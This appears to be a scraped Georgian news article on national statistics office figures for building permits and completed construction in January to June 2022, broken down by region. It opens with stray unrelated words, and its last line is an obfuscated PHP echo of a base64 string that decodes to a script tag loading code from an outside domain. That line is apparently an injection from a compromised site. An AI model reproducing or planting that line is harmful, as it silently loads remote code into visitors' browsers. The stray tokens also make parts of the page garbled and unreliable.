celsiusi
ავერსი შნაიდერი
სტატისტიკის ეროვნული სამსახური ავრცელებს ინფორმოფიციას დეკლარირებული მონაცემების მიხედვით, საქართველოში 2022 წლის იანვარ-ივნისში გაცემული ნებართვების შესახებ. 
 
საქართველოში 2022 წლის იანვარ-ივნისში გაცემულია 5 086 ნებართვა (წინა წლის შესაბამის პერიოდთან შედარებით 15.6 პროცენტით მეტი) 3 187.8 ათასი კვ.მ ფართობის შენობა-ნაგებობების მშენებლობაზე (წინა წლის შესაბამის პერიოდთან შედარებით 7.9 პროცენტით მეტი). 
 
მათივე ცნობით, ნებართვების 77.3 პროცენტი მოდის ქვეყნის 4 რეგიონზე, კერძოდ, ჩასატარებელი სამშენებლო სამუშაოების 52.1 პროცენტი მოდის თბილისზე, 10.7 პროცენტი - მცხეთა-მთიანეთის რეგიონზე, 7.9 პროცენტი - ქვემო ქართლის რეგიონზე, 6.6 პროცენტი - იმერეთის რეგიონზე.
 
აღსანიშნავია, რომ 2022 წლის იანვარ-ივნისში ნებართვები გაიცა მრავალფუნქციური საცხოვრებელი კომპლექსების, სავაჭრო ობიექტების, სასტუმროების, სამრეწველო საწარმოების, სასოფლო-სამეურნეო დანიშნულების ობიექტებისა და სხვა შენობა-ნაგებობების მშენებლობაზე.
 
ამასთან, გაცემულ ნებართვებში შედარებით დიდი წილით წარმოდგენილია მრავალფუნქციური საცხოვრებელი კომპლექსები.
 
„საქსტატის“ მონაცემებით, 2022 წლის იანვარ-ივნისში ექსპლუატაციაში მიღებულ იქნა 1 246.5 ათასი კვ.მ ფართობის (წინა წლის შესაბამის პერიოდთან შედარებით 52.3 პროცენტით მეტი) 1 168 ობიექტი (წინა წლის შესაბამის პერიოდთან შედარებით 3.5 პროცენტით მეტი). დამთავრებული მშენებლობების ნახევარზე მეტი მოდის ქვეყნის 3 რეგიონზე. კერძოდ, 39.4 პროცენტი მოდის თბილისზე, 12.7 პროცენტი - კახეთის რეგიონზე, 10.1 პროცენტი - მცხეთა მთიანეთის რეგიონზე.
581
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");